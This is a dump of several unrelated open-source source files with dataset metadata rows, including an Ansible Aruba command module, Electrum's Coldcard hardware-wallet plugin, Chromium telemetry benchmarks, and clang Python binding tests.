## class LoadLibs(unittest.TestCase):
## def test_libm(self):
## import math
## libm = cdll.libm
## sqrt = libm.sqrt
## sqrt.argtypes = (c_double,)
## sqrt.restype = c_double
## self.assertEqual(sqrt(2), math.sqrt(2))
if __name__ == "__main__":
unittest.main()
| apache-2.0 | 962,078,443,507,699,300 | 29.121951 | 77 | 0.562753 | false |
yannrouillard/weboob | modules/prixcarburants/test.py | 5 | 1088 | # -*- coding: utf-8 -*-
# Copyright(C) 2012 Romain Bignon
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
from weboob.tools.test import BackendTest
class PrixCarburantsTest(BackendTest):
BACKEND = 'prixcarburants'
def test_prixcarburants(self):
products = list(self.backend.search_products('gpl'))
self.assertTrue(len(products) == 1)
prices = list(self.backend.iter_prices(products[0]))
self.backend.fillobj(prices[0])
| agpl-3.0 | -7,769,473,672,478,221,000 | 33 | 77 | 0.729779 | false |
CyanogenMod/android_external_chromium_org | tools/perf/benchmarks/session_restore.py | 8 | 2414 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import tempfile
from measurements import session_restore
from measurements import session_restore_with_url
import page_sets
from profile_creators import small_profile_creator
from telemetry import test
from telemetry.page import profile_generator
class _SessionRestoreTest(test.Test):
@classmethod
def ProcessCommandLineArgs(cls, parser, args):
super(_SessionRestoreTest, cls).ProcessCommandLineArgs(parser, args)
profile_type = 'small_profile'
if not args.browser_options.profile_dir:
profile_dir = os.path.join(tempfile.gettempdir(), profile_type)
if not os.path.exists(profile_dir):
new_args = args.Copy()
new_args.pageset_repeat = 1
new_args.output_dir = profile_dir
profile_generator.GenerateProfiles(
small_profile_creator.SmallProfileCreator, profile_type, new_args)
args.browser_options.profile_dir = os.path.join(profile_dir, profile_type)
@test.Disabled('android', 'linux') # crbug.com/325479, crbug.com/381990
class SessionRestoreColdTypical25(_SessionRestoreTest):
tag = 'cold'
test = session_restore.SessionRestore
page_set = page_sets.Typical25PageSet
options = {'cold': True,
'pageset_repeat': 5}
@test.Disabled('android', 'linux') # crbug.com/325479, crbug.com/381990
class SessionRestoreWarmTypical25(_SessionRestoreTest):
tag = 'warm'
test = session_restore.SessionRestore
page_set = page_sets.Typical25PageSet
options = {'warm': True,
'pageset_repeat': 20}
@test.Disabled('android', 'linux') # crbug.com/325479, crbug.com/381990
class SessionRestoreWithUrlCold(_SessionRestoreTest):
"""Measure Chrome cold session restore with startup URLs."""
tag = 'cold'
test = session_restore_with_url.SessionRestoreWithUrl
page_set = page_sets.StartupPagesPageSet
options = {'cold': True,
'pageset_repeat': 5}
@test.Disabled('android', 'linux') # crbug.com/325479, crbug.com/381990
class SessionRestoreWithUrlWarm(_SessionRestoreTest):
"""Measure Chrome warm session restore with startup URLs."""
tag = 'warm'
test = session_restore_with_url.SessionRestoreWithUrl
page_set = page_sets.StartupPagesPageSet
options = {'warm': True,
'pageset_repeat': 10}
| bsd-3-clause | -5,938,513,011,298,622,000 | 34.5 | 80 | 0.726181 | false |
daenamkim/ansible | lib/ansible/modules/network/aruba/aruba_command.py | 17 | 6873 | #!/usr/bin/python
#
# Copyright: Ansible Team
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: aruba_command
version_added: "2.4"
author: "James Mighion (@jmighion)"
short_description: Run commands on remote devices running Aruba Mobility Controller
description:
- Sends arbitrary commands to an aruba node and returns the results
read from the device. This module includes an
argument that will cause the module to wait for a specific condition
before returning or timing out if the condition is not met.
- This module does not support running commands in configuration mode.
Please use M(aruba_config) to configure Aruba devices.
extends_documentation_fragment: aruba
options:
commands:
description:
- List of commands to send to the remote aruba device over the
configured provider. The resulting output from the command
is returned. If the I(wait_for) argument is provided, the
module is not returned until the condition is satisfied or
the number of retries has expired.
required: true
wait_for:
description:
- List of conditions to evaluate against the output of the
command. The task will wait for each condition to be true
before moving forward. If the conditional is not true
within the configured number of retries, the task fails.
See examples.
required: false
default: null
aliases: ['waitfor']
match:
description:
- The I(match) argument is used in conjunction with the
I(wait_for) argument to specify the match policy. Valid
values are C(all) or C(any). If the value is set to C(all)
then all conditionals in the wait_for must be satisfied. If
the value is set to C(any) then only one of the values must be
satisfied.
required: false
default: all
choices: ['any', 'all']
retries:
description:
        - Specifies the number of retries a command should be tried
before it is considered failed. The command is run on the
target device every retry and evaluated against the
I(wait_for) conditions.
required: false
default: 10
interval:
description:
- Configures the interval in seconds to wait between retries
of the command. If the command does not pass the specified
conditions, the interval indicates how long to wait before
trying the command again.
required: false
default: 1
"""
EXAMPLES = """
tasks:
- name: run show version on remote devices
aruba_command:
commands: show version
- name: run show version and check to see if output contains Aruba
aruba_command:
commands: show version
wait_for: result[0] contains Aruba
- name: run multiple commands on remote nodes
aruba_command:
commands:
- show version
- show interfaces
- name: run multiple commands and evaluate the output
aruba_command:
commands:
- show version
- show interfaces
wait_for:
- result[0] contains Aruba
- result[1] contains Loopback0
"""
RETURN = """
stdout:
description: The set of responses from the commands
returned: always
type: list
sample: ['...', '...']
stdout_lines:
description: The value of stdout split into a list
returned: always
type: list
sample: [['...', '...'], ['...'], ['...']]
failed_conditions:
description: The list of conditionals that have failed
returned: failed
type: list
sample: ['...', '...']
"""
import time
from ansible.module_utils.network.aruba.aruba import run_commands
from ansible.module_utils.network.aruba.aruba import aruba_argument_spec, check_args
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.common.utils import ComplexList
from ansible.module_utils.network.common.parsing import Conditional
from ansible.module_utils.six import string_types
def to_lines(stdout):
for item in stdout:
if isinstance(item, string_types):
item = str(item).split('\n')
yield item
def parse_commands(module, warnings):
command = ComplexList(dict(
command=dict(key=True),
prompt=dict(),
answer=dict()
), module)
commands = command(module.params['commands'])
for index, item in enumerate(commands):
if module.check_mode and not item['command'].startswith('show'):
warnings.append(
'only show commands are supported when using check mode, not '
'executing `%s`' % item['command']
)
elif item['command'].startswith('conf'):
module.fail_json(
msg='aruba_command does not support running config mode '
'commands. Please use aruba_config instead'
)
return commands
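# Note (illustrative, not part of the original module): because ComplexList is
# keyed on 'command', a task may mix plain strings and dicts, e.g.
#   commands:
#     - show version
#     - { command: "show running-config", prompt: "continue?", answer: "y" }
# both forms are normalized to dicts carrying 'command', 'prompt' and 'answer'
# before being handed to run_commands().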
def main():
"""main entry point for module execution
"""
argument_spec = dict(
commands=dict(type='list', required=True),
wait_for=dict(type='list', aliases=['waitfor']),
match=dict(default='all', choices=['all', 'any']),
retries=dict(default=10, type='int'),
interval=dict(default=1, type='int')
)
argument_spec.update(aruba_argument_spec)
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
result = {'changed': False}
warnings = list()
check_args(module, warnings)
commands = parse_commands(module, warnings)
result['warnings'] = warnings
wait_for = module.params['wait_for'] or list()
conditionals = [Conditional(c) for c in wait_for]
retries = module.params['retries']
interval = module.params['interval']
match = module.params['match']
while retries > 0:
responses = run_commands(module, commands)
for item in list(conditionals):
if item(responses):
if match == 'any':
conditionals = list()
break
conditionals.remove(item)
if not conditionals:
break
time.sleep(interval)
retries -= 1
if conditionals:
failed_conditions = [item.raw for item in conditionals]
        msg = 'One or more conditional statements have not been satisfied'
module.fail_json(msg=msg, failed_conditions=failed_conditions)
result.update({
'changed': False,
'stdout': responses,
'stdout_lines': list(to_lines(responses))
})
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 | -5,229,550,708,341,911,000 | 30.099548 | 92 | 0.645715 | false |
fujicoin/electrum-fjc | electrum/plugins/coldcard/coldcard.py | 2 | 26391 | #
# Coldcard Electrum plugin main code.
#
#
from struct import pack, unpack
import os, sys, time, io
import traceback
from electrum.bip32 import BIP32Node, InvalidMasterKeyVersionBytes
from electrum.i18n import _
from electrum.plugin import Device
from electrum.keystore import Hardware_KeyStore, xpubkey_to_pubkey, Xpub
from electrum.transaction import Transaction
from electrum.wallet import Standard_Wallet
from electrum.crypto import hash_160
from electrum.util import bfh, bh2u, versiontuple, UserFacingException
from electrum.base_wizard import ScriptTypeNotSupported
from electrum.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import LibraryFoundButUnusable
_logger = get_logger(__name__)
try:
import hid
from ckcc.protocol import CCProtocolPacker, CCProtocolUnpacker
from ckcc.protocol import CCProtoError, CCUserRefused, CCBusyError
from ckcc.constants import (MAX_MSG_LEN, MAX_BLK_LEN, MSG_SIGNING_MAX_LENGTH, MAX_TXN_LEN,
AF_CLASSIC, AF_P2SH, AF_P2WPKH, AF_P2WSH, AF_P2WPKH_P2SH, AF_P2WSH_P2SH)
from ckcc.constants import (
PSBT_GLOBAL_UNSIGNED_TX, PSBT_IN_NON_WITNESS_UTXO, PSBT_IN_WITNESS_UTXO,
PSBT_IN_SIGHASH_TYPE, PSBT_IN_REDEEM_SCRIPT, PSBT_IN_WITNESS_SCRIPT,
PSBT_IN_BIP32_DERIVATION, PSBT_OUT_BIP32_DERIVATION, PSBT_OUT_REDEEM_SCRIPT)
from ckcc.client import ColdcardDevice, COINKITE_VID, CKCC_PID, CKCC_SIMULATOR_PATH
requirements_ok = True
class ElectrumColdcardDevice(ColdcardDevice):
# avoid use of pycoin for MiTM message signature test
def mitm_verify(self, sig, expect_xpub):
# verify a signature (65 bytes) over the session key, using the master bip32 node
# - customized to use specific EC library of Electrum.
pubkey = BIP32Node.from_xkey(expect_xpub).eckey
try:
pubkey.verify_message_hash(sig[1:65], self.session_key)
return True
except:
return False
except ImportError:
requirements_ok = False
COINKITE_VID = 0xd13e
CKCC_PID = 0xcc10
CKCC_SIMULATED_PID = CKCC_PID ^ 0x55aa
def my_var_int(l):
# Bitcoin serialization of integers... directly into binary!
if l < 253:
return pack("B", l)
elif l < 0x10000:
return pack("<BH", 253, l)
elif l < 0x100000000:
return pack("<BI", 254, l)
else:
return pack("<BQ", 255, l)
def xfp_from_xpub(xpub):
    # sometimes we need the BIP32 fingerprint value: 4 bytes of ripemd(sha256(pubkey))
# UNTESTED
kk = bfh(Xpub.get_pubkey_from_xpub(xpub, []))
assert len(kk) == 33
xfp, = unpack('<I', hash_160(kk)[0:4])
return xfp
class CKCCClient:
# Challenge: I haven't found anywhere that defines a base class for this 'client',
# nor an API (interface) to be met. Winging it. Gets called from lib/plugins.py mostly?
def __init__(self, plugin, handler, dev_path, is_simulator=False):
self.device = plugin.device
self.handler = handler
# if we know what the (xfp, xpub) "should be" then track it here
self._expected_device = None
if is_simulator:
self.dev = ElectrumColdcardDevice(dev_path, encrypt=True)
else:
# open the real HID device
import hid
hd = hid.device(path=dev_path)
hd.open_path(dev_path)
self.dev = ElectrumColdcardDevice(dev=hd, encrypt=True)
# NOTE: MiTM test is delayed until we have a hint as to what XPUB we
# should expect. It's also kinda slow.
def __repr__(self):
return '<CKCCClient: xfp=%08x label=%r>' % (self.dev.master_fingerprint,
self.label())
def verify_connection(self, expected_xfp, expected_xpub):
ex = (expected_xfp, expected_xpub)
if self._expected_device == ex:
# all is as expected
return
if ( (self._expected_device is not None)
or (self.dev.master_fingerprint != expected_xfp)
or (self.dev.master_xpub != expected_xpub)):
            # probably indicating a programming error, not hacking
_logger.info(f"xpubs. reported by device: {self.dev.master_xpub}. "
f"stored in file: {expected_xpub}")
raise RuntimeError("Expecting 0x%08x but that's not what's connected?!" %
expected_xfp)
# check signature over session key
# - mitm might have lied about xfp and xpub up to here
# - important that we use value capture at wallet creation time, not some value
# we read over USB today
self.dev.check_mitm(expected_xpub=expected_xpub)
self._expected_device = ex
_logger.info("Successfully verified against MiTM")
def is_pairable(self):
# can't do anything w/ devices that aren't setup (but not normally reachable)
return bool(self.dev.master_xpub)
def timeout(self, cutoff):
# nothing to do?
pass
def close(self):
# close the HID device (so can be reused)
self.dev.close()
self.dev = None
def is_initialized(self):
return bool(self.dev.master_xpub)
def label(self):
# 'label' of this Coldcard. Warning: gets saved into wallet file, which might
# not be encrypted, so better for privacy if based on xpub/fingerprint rather than
# USB serial number.
if self.dev.is_simulator:
lab = 'Coldcard Simulator 0x%08x' % self.dev.master_fingerprint
elif not self.dev.master_fingerprint:
            # fallback; not expected
lab = 'Coldcard #' + self.dev.serial
else:
lab = 'Coldcard 0x%08x' % self.dev.master_fingerprint
# Hack zone: during initial setup I need the xfp and master xpub but
# very few objects are passed between the various steps of base_wizard.
# Solution: return a string with some hidden metadata
# - see <https://stackoverflow.com/questions/7172772/abc-for-string>
# - needs to work w/ deepcopy
class LabelStr(str):
def __new__(cls, s, xfp=None, xpub=None):
self = super().__new__(cls, str(s))
self.xfp = getattr(s, 'xfp', xfp)
self.xpub = getattr(s, 'xpub', xpub)
return self
return LabelStr(lab, self.dev.master_fingerprint, self.dev.master_xpub)
def has_usable_connection_with_device(self):
# Do end-to-end ping test
try:
self.ping_check()
return True
except:
return False
def get_xpub(self, bip32_path, xtype):
assert xtype in ColdcardPlugin.SUPPORTED_XTYPES
_logger.info('Derive xtype = %r' % xtype)
xpub = self.dev.send_recv(CCProtocolPacker.get_xpub(bip32_path), timeout=5000)
# TODO handle timeout?
# change type of xpub to the requested type
try:
node = BIP32Node.from_xkey(xpub)
except InvalidMasterKeyVersionBytes:
raise UserFacingException(_('Invalid xpub magic. Make sure your {} device is set to the correct chain.')
.format(self.device)) from None
if xtype != 'standard':
xpub = node._replace(xtype=xtype).to_xpub()
return xpub
def ping_check(self):
# check connection is working
assert self.dev.session_key, 'not encrypted?'
req = b'1234 Electrum Plugin 4321' # free up to 59 bytes
try:
echo = self.dev.send_recv(CCProtocolPacker.ping(req))
assert echo == req
except:
raise RuntimeError("Communication trouble with Coldcard")
def show_address(self, path, addr_fmt):
        # prompt user w/ address, also returns it immediately.
return self.dev.send_recv(CCProtocolPacker.show_address(path, addr_fmt), timeout=None)
def get_version(self):
# gives list of strings
return self.dev.send_recv(CCProtocolPacker.version(), timeout=1000).split('\n')
def sign_message_start(self, path, msg):
# this starts the UX experience.
self.dev.send_recv(CCProtocolPacker.sign_message(msg, path), timeout=None)
def sign_message_poll(self):
# poll device... if user has approved, will get tuple: (addr, sig) else None
return self.dev.send_recv(CCProtocolPacker.get_signed_msg(), timeout=None)
def sign_transaction_start(self, raw_psbt, finalize=True):
# Multiple steps to sign:
# - upload binary
# - start signing UX
# - wait for coldcard to complete process, or have it refused.
# - download resulting txn
assert 20 <= len(raw_psbt) < MAX_TXN_LEN, 'PSBT is too big'
dlen, chk = self.dev.upload_file(raw_psbt)
resp = self.dev.send_recv(CCProtocolPacker.sign_transaction(dlen, chk, finalize=finalize),
timeout=None)
if resp != None:
raise ValueError(resp)
def sign_transaction_poll(self):
        # poll device... if user has approved, will get tuple: (length, checksum) else None
return self.dev.send_recv(CCProtocolPacker.get_signed_txn(), timeout=None)
def download_file(self, length, checksum, file_number=1):
# get a file
return self.dev.download_file(length, checksum, file_number=file_number)
class Coldcard_KeyStore(Hardware_KeyStore):
hw_type = 'coldcard'
device = 'Coldcard'
def __init__(self, d):
Hardware_KeyStore.__init__(self, d)
# Errors and other user interaction is done through the wallet's
# handler. The handler is per-window and preserved across
# device reconnects
self.force_watching_only = False
self.ux_busy = False
# Seems like only the derivation path and resulting **derived** xpub is stored in
# the wallet file... however, we need to know at least the fingerprint of the master
# xpub to verify against MiTM, and also so we can put the right value into the subkey paths
# of PSBT files that might be generated offline.
# - save the fingerprint of the master xpub, as "xfp"
        # - it's a LE32 int, but hex is a more natural way to see it
# - device reports these value during encryption setup process
lab = d['label']
if hasattr(lab, 'xfp'):
# initial setup
self.ckcc_xfp = lab.xfp
self.ckcc_xpub = lab.xpub
else:
# wallet load: fatal if missing, we need them!
self.ckcc_xfp = d['ckcc_xfp']
self.ckcc_xpub = d['ckcc_xpub']
def dump(self):
# our additions to the stored data about keystore -- only during creation?
d = Hardware_KeyStore.dump(self)
d['ckcc_xfp'] = self.ckcc_xfp
d['ckcc_xpub'] = self.ckcc_xpub
return d
def get_derivation(self):
return self.derivation
def get_client(self):
        # called when user tries to do something like view address, sign something.
# - not called during probing/setup
rv = self.plugin.get_client(self)
if rv:
rv.verify_connection(self.ckcc_xfp, self.ckcc_xpub)
return rv
def give_error(self, message, clear_client=False):
self.logger.info(message)
if not self.ux_busy:
self.handler.show_error(message)
else:
self.ux_busy = False
if clear_client:
self.client = None
raise UserFacingException(message)
def wrap_busy(func):
# decorator: function takes over the UX on the device.
def wrapper(self, *args, **kwargs):
try:
self.ux_busy = True
return func(self, *args, **kwargs)
finally:
self.ux_busy = False
return wrapper
def decrypt_message(self, pubkey, message, password):
raise UserFacingException(_('Encryption and decryption are currently not supported for {}').format(self.device))
@wrap_busy
def sign_message(self, sequence, message, password):
# Sign a message on device. Since we have big screen, of course we
        # have to show the message unambiguously there first!
try:
msg = message.encode('ascii', errors='strict')
assert 1 <= len(msg) <= MSG_SIGNING_MAX_LENGTH
except (UnicodeError, AssertionError):
# there are other restrictions on message content,
# but let the device enforce and report those
self.handler.show_error('Only short (%d max) ASCII messages can be signed.'
% MSG_SIGNING_MAX_LENGTH)
return b''
client = self.get_client()
path = self.get_derivation() + ("/%d/%d" % sequence)
try:
cl = self.get_client()
try:
self.handler.show_message("Signing message (using %s)..." % path)
cl.sign_message_start(path, msg)
while 1:
# How to kill some time, without locking UI?
time.sleep(0.250)
resp = cl.sign_message_poll()
if resp is not None:
break
finally:
self.handler.finished()
assert len(resp) == 2
addr, raw_sig = resp
# already encoded in Bitcoin fashion, binary.
assert 40 < len(raw_sig) <= 65
return raw_sig
except (CCUserRefused, CCBusyError) as exc:
self.handler.show_error(str(exc))
except CCProtoError as exc:
            self.logger.exception('Error signing message')
            self.handler.show_error('{}\n\n{}'.format(
                _('Error signing message') + ':', str(exc)))
except Exception as e:
self.give_error(e, True)
# give empty bytes for error cases; it seems to clear the old signature box
return b''
def build_psbt(self, tx: Transaction, wallet=None, xfp=None):
# Render a PSBT file, for upload to Coldcard.
#
if xfp is None:
# need fingerprint of MASTER xpub, not the derived key
xfp = self.ckcc_xfp
inputs = tx.inputs()
if 'prev_tx' not in inputs[0]:
# fetch info about inputs, if needed?
# - needed during export PSBT flow, not normal online signing
assert wallet, 'need wallet reference'
wallet.add_hw_info(tx)
# wallet.add_hw_info installs this attr
assert tx.output_info is not None, 'need data about outputs'
# Build map of pubkey needed as derivation from master, in PSBT binary format
# 1) binary version of the common subpath for all keys
# m/ => fingerprint LE32
# a/b/c => ints
base_path = pack('<I', xfp)
for x in self.get_derivation()[2:].split('/'):
if x.endswith("'"):
x = int(x[:-1]) | 0x80000000
else:
x = int(x)
base_path += pack('<I', x)
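        # For example (illustrative values only): with an xfp of 0x0f056943
        # and a keystore derivation of m/44'/0'/0', base_path is four
        # little-endian uint32s -- the fingerprint, then 44|0x80000000,
        # 0|0x80000000 and 0|0x80000000 -- i.e. 16 bytes in total.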
# 2) all used keys in transaction
subkeys = {}
derivations = self.get_tx_derivations(tx)
for xpubkey in derivations:
pubkey = xpubkey_to_pubkey(xpubkey)
            # assuming depth two, non-hardened: change + index
aa, bb = derivations[xpubkey]
assert 0 <= aa < 0x80000000
assert 0 <= bb < 0x80000000
subkeys[bfh(pubkey)] = base_path + pack('<II', aa, bb)
for txin in inputs:
if txin['type'] == 'coinbase':
self.give_error("Coinbase not supported")
if txin['type'] in ['p2sh', 'p2wsh-p2sh', 'p2wsh']:
self.give_error('No support yet for inputs of type: ' + txin['type'])
# Construct PSBT from start to finish.
out_fd = io.BytesIO()
out_fd.write(b'psbt\xff')
def write_kv(ktype, val, key=b''):
# serialize helper: write w/ size and key byte
out_fd.write(my_var_int(1 + len(key)))
out_fd.write(bytes([ktype]) + key)
if isinstance(val, str):
val = bfh(val)
out_fd.write(my_var_int(len(val)))
out_fd.write(val)
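        # Note (added for clarity, not in the original file): each write_kv() call emits
        # one PSBT key-value record framed as
        #   <varint key length><key type byte + key><varint value length><value>
        # which is the encoding used for every global, input, and output field below.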
# global section: just the unsigned txn
class CustomTXSerialization(Transaction):
@classmethod
def input_script(cls, txin, estimate_size=False):
return ''
unsigned = bfh(CustomTXSerialization(tx.serialize()).serialize_to_network(witness=False))
write_kv(PSBT_GLOBAL_UNSIGNED_TX, unsigned)
# end globals section
out_fd.write(b'\x00')
# inputs section
for txin in inputs:
if Transaction.is_segwit_input(txin):
utxo = txin['prev_tx'].outputs()[txin['prevout_n']]
spendable = txin['prev_tx'].serialize_output(utxo)
write_kv(PSBT_IN_WITNESS_UTXO, spendable)
else:
write_kv(PSBT_IN_NON_WITNESS_UTXO, str(txin['prev_tx']))
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
pubkeys = [bfh(k) for k in pubkeys]
for k in pubkeys:
write_kv(PSBT_IN_BIP32_DERIVATION, subkeys[k], k)
if txin['type'] == 'p2wpkh-p2sh':
assert len(pubkeys) == 1, 'can be only one redeem script per input'
pa = hash_160(k)
assert len(pa) == 20
write_kv(PSBT_IN_REDEEM_SCRIPT, b'\x00\x14'+pa)
out_fd.write(b'\x00')
# outputs section
for o in tx.outputs():
            # can be empty, but must be present, and helpful to show change outputs
# wallet.add_hw_info() adds some data about change outputs into tx.output_info
if o.address in tx.output_info:
                # this address "is_mine" but might not be change (I like to send to myself)
output_info = tx.output_info.get(o.address)
index, xpubs = output_info.address_index, output_info.sorted_xpubs
if index[0] == 1 and len(index) == 2:
# it is a change output (based on our standard derivation path)
assert len(xpubs) == 1 # not expecting multisig
xpubkey = xpubs[0]
# document its bip32 derivation in output section
aa, bb = index
assert 0 <= aa < 0x80000000
assert 0 <= bb < 0x80000000
deriv = base_path + pack('<II', aa, bb)
pubkey = bfh(self.get_pubkey_from_xpub(xpubkey, index))
write_kv(PSBT_OUT_BIP32_DERIVATION, deriv, pubkey)
if output_info.script_type == 'p2wpkh-p2sh':
pa = hash_160(pubkey)
assert len(pa) == 20
write_kv(PSBT_OUT_REDEEM_SCRIPT, b'\x00\x14' + pa)
out_fd.write(b'\x00')
return out_fd.getvalue()
@wrap_busy
def sign_transaction(self, tx, password):
# Build a PSBT in memory, upload it for signing.
# - we can also work offline (without paired device present)
if tx.is_complete():
return
client = self.get_client()
assert client.dev.master_fingerprint == self.ckcc_xfp
raw_psbt = self.build_psbt(tx)
#open('debug.psbt', 'wb').write(out_fd.getvalue())
try:
try:
self.handler.show_message("Authorize Transaction...")
client.sign_transaction_start(raw_psbt, True)
while 1:
# How to kill some time, without locking UI?
time.sleep(0.250)
resp = client.sign_transaction_poll()
if resp is not None:
break
rlen, rsha = resp
# download the resulting txn.
new_raw = client.download_file(rlen, rsha)
finally:
self.handler.finished()
except (CCUserRefused, CCBusyError) as exc:
self.logger.info(f'Did not sign: {exc}')
self.handler.show_error(str(exc))
return
except BaseException as e:
self.logger.exception('')
self.give_error(e, True)
return
        # trust the coldcard to re-serialize the final product, right?
tx.update(bh2u(new_raw))
@staticmethod
def _encode_txin_type(txin_type):
# Map from Electrum code names to our code numbers.
return {'standard': AF_CLASSIC, 'p2pkh': AF_CLASSIC,
'p2sh': AF_P2SH,
'p2wpkh-p2sh': AF_P2WPKH_P2SH,
'p2wpkh': AF_P2WPKH,
'p2wsh-p2sh': AF_P2WSH_P2SH,
'p2wsh': AF_P2WSH,
}[txin_type]
@wrap_busy
def show_address(self, sequence, txin_type):
client = self.get_client()
address_path = self.get_derivation()[2:] + "/%d/%d"%sequence
addr_fmt = self._encode_txin_type(txin_type)
try:
try:
self.handler.show_message(_("Showing address ..."))
dev_addr = client.show_address(address_path, addr_fmt)
# we could double check address here
finally:
self.handler.finished()
except CCProtoError as exc:
self.logger.exception('Error showing address')
self.handler.show_error('{}\n\n{}'.format(
_('Error showing address') + ':', str(exc)))
except BaseException as exc:
self.logger.exception('')
self.handler.show_error(exc)
class ColdcardPlugin(HW_PluginBase):
keystore_class = Coldcard_KeyStore
minimum_library = (0, 7, 2)
client = None
DEVICE_IDS = [
(COINKITE_VID, CKCC_PID),
(COINKITE_VID, CKCC_SIMULATED_PID)
]
#SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
SUPPORTED_XTYPES = ('standard', 'p2wpkh', 'p2wpkh-p2sh')
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_devices(self.DEVICE_IDS)
self.device_manager().register_enumerate_func(self.detect_simulator)
def get_library_version(self):
import ckcc
try:
version = ckcc.__version__
except AttributeError:
version = 'unknown'
if requirements_ok:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
def detect_simulator(self):
# if there is a simulator running on this machine,
# return details about it so it's offered as a pairing choice
fn = CKCC_SIMULATOR_PATH
if os.path.exists(fn):
return [Device(path=fn,
interface_number=-1,
id_=fn,
product_key=(COINKITE_VID, CKCC_SIMULATED_PID),
usage_page=0,
transport_ui_string='simulator')]
return []
def create_client(self, device, handler):
if handler:
self.handler = handler
# We are given a HID device, or at least some details about it.
        # Not sure why we aren't just given a HID library handle, but
        # the 'path' is unambiguous, so we'll use that.
try:
rv = CKCCClient(self, handler, device.path,
is_simulator=(device.product_key[1] == CKCC_SIMULATED_PID))
return rv
except:
self.logger.info('late failure connecting to device?')
return None
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
client.handler = self.create_handler(wizard)
def get_xpub(self, device_id, derivation, xtype, wizard):
# this seems to be part of the pairing process only, not during normal ops?
# base_wizard:on_hw_derivation
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = self.create_handler(wizard)
client.ping_check()
xpub = client.get_xpub(derivation, xtype)
return xpub
def get_client(self, keystore, force_pair=True):
        # All client interaction should happen outside the main GUI thread
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
#if client:
# client.used()
if client is not None:
client.ping_check()
return client
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
# Standard_Wallet => not multisig, must be bip32
if type(wallet) is not Standard_Wallet:
keystore.handler.show_error(_('This function is only available for standard wallets when using {}.').format(self.device))
return
sequence = wallet.get_address_index(address)
txin_type = wallet.get_txin_type(address)
keystore.show_address(sequence, txin_type)
# EOF
| mit | -8,262,395,673,221,224,000 | 36.066011 | 133 | 0.58088 | false |
ah744/ScaffCC_RKQC | clang/bindings/python/tests/cindex/test_type.py | 5 | 7493 | from clang.cindex import CursorKind
from clang.cindex import TypeKind
from nose.tools import raises
from .util import get_cursor
from .util import get_tu
kInput = """\
typedef int I;
struct teststruct {
int a;
I b;
long c;
unsigned long d;
signed long e;
const int f;
int *g;
int ***h;
};
"""
def test_a_struct():
tu = get_tu(kInput)
teststruct = get_cursor(tu, 'teststruct')
assert teststruct is not None, "Could not find teststruct."
fields = list(teststruct.get_children())
assert all(x.kind == CursorKind.FIELD_DECL for x in fields)
assert fields[0].spelling == 'a'
assert not fields[0].type.is_const_qualified()
assert fields[0].type.kind == TypeKind.INT
assert fields[0].type.get_canonical().kind == TypeKind.INT
assert fields[1].spelling == 'b'
assert not fields[1].type.is_const_qualified()
assert fields[1].type.kind == TypeKind.TYPEDEF
assert fields[1].type.get_canonical().kind == TypeKind.INT
assert fields[1].type.get_declaration().spelling == 'I'
assert fields[2].spelling == 'c'
assert not fields[2].type.is_const_qualified()
assert fields[2].type.kind == TypeKind.LONG
assert fields[2].type.get_canonical().kind == TypeKind.LONG
assert fields[3].spelling == 'd'
assert not fields[3].type.is_const_qualified()
assert fields[3].type.kind == TypeKind.ULONG
assert fields[3].type.get_canonical().kind == TypeKind.ULONG
assert fields[4].spelling == 'e'
assert not fields[4].type.is_const_qualified()
assert fields[4].type.kind == TypeKind.LONG
assert fields[4].type.get_canonical().kind == TypeKind.LONG
assert fields[5].spelling == 'f'
assert fields[5].type.is_const_qualified()
assert fields[5].type.kind == TypeKind.INT
assert fields[5].type.get_canonical().kind == TypeKind.INT
assert fields[6].spelling == 'g'
assert not fields[6].type.is_const_qualified()
assert fields[6].type.kind == TypeKind.POINTER
assert fields[6].type.get_pointee().kind == TypeKind.INT
assert fields[7].spelling == 'h'
assert not fields[7].type.is_const_qualified()
assert fields[7].type.kind == TypeKind.POINTER
assert fields[7].type.get_pointee().kind == TypeKind.POINTER
assert fields[7].type.get_pointee().get_pointee().kind == TypeKind.POINTER
assert fields[7].type.get_pointee().get_pointee().get_pointee().kind == TypeKind.INT
constarrayInput="""
struct teststruct {
void *A[2];
};
"""
def testConstantArray():
tu = get_tu(constarrayInput)
teststruct = get_cursor(tu, 'teststruct')
assert teststruct is not None, "Didn't find teststruct??"
fields = list(teststruct.get_children())
assert fields[0].spelling == 'A'
assert fields[0].type.kind == TypeKind.CONSTANTARRAY
